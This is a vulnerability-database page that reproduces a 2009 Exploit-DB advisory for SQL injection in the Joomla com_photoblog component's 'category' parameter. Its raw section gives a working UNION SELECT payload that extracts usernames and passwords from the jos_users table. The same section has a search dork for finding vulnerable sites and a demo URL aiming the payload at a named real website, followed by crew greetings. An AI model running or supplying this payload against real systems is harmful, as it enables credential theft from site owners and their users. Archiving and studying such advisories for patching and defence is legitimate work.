Joomla Component com_photoblog SQL injection vulnerability - (category)

vendor:

Webguerilla.net

by:

kaMtiEz

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: Webguerilla.net

Affected Version From: alpha 3

Affected Version To: alpha 3a

Patch Exists: Yes

Related CWE: N/A

CPE: a:webguerilla:webguerilla_net

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_photoblog SQL injection vulnerability – (category)

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'category' in the URL. The malicious query will be executed in the backend database, allowing the attacker to access sensitive information such as usernames and passwords.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version.

Source

Exploit-DB raw data:

/**************************************************************************

[~] Joomla Component com_photoblog SQL injection vulnerability - (category)
[~] Author	: kaMtiEz (kamzcrew@gmail.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: October 12, 2009
[~] Tune In	: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://webguerilla.net/
[+] Download : http://webguerilla.net/downloads/3-components-for-joomla-1
[+] version : alpha 3 - alpha 3a
[+] Vulnerability : SQL injection
[+] Dork : inurl:"kaMtiEz"+"tukulesto"
[+] Price : FREE

===========================================================================
[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_photoblog&view=blogs&category=[INDONESIANCODER]

[ Exploit ]

-666/**/union/**/select/**/6,concat(0x3a,username,password),6,6,version(),6,6,6,6,6,6,6,6,6/**/from/**/jos_users/*

[ Demo ]

http://www.wideskygroup.com/index.php?option=com_photoblog&view=blogs&category=-666/**/union/**/select/**/6,concat%280x3a,username,password%29,6,6,version%28%29,6,6,6,6,6,6,6,6,6/**/from/**/jos_users/*
===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM - KILL-9 CREW - KIRIK CREW - MainHack Brotherhood - ServerIsDown
[+] Don Tukulesto, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, och3_an3h
[+] Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz
[+] Coracore, black666girl, NepT, ichal, tengik, Gh4mb4s ,rendy, Jack- and YOU!!

[ NOTE ] 

[+] Mom and dad and my sister i love u .. for my girlfriends thx for your support mwahhhh ^_^
[+] setelah bertapa bersama om tukulesto .. akhirnya .. mendapatkan bugs lagi !
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D

[ QUOTE ]

[+] M3NW5 kemana aje lo ?? kangen nih .. hha
[+] AURAKASIH dont leave me ...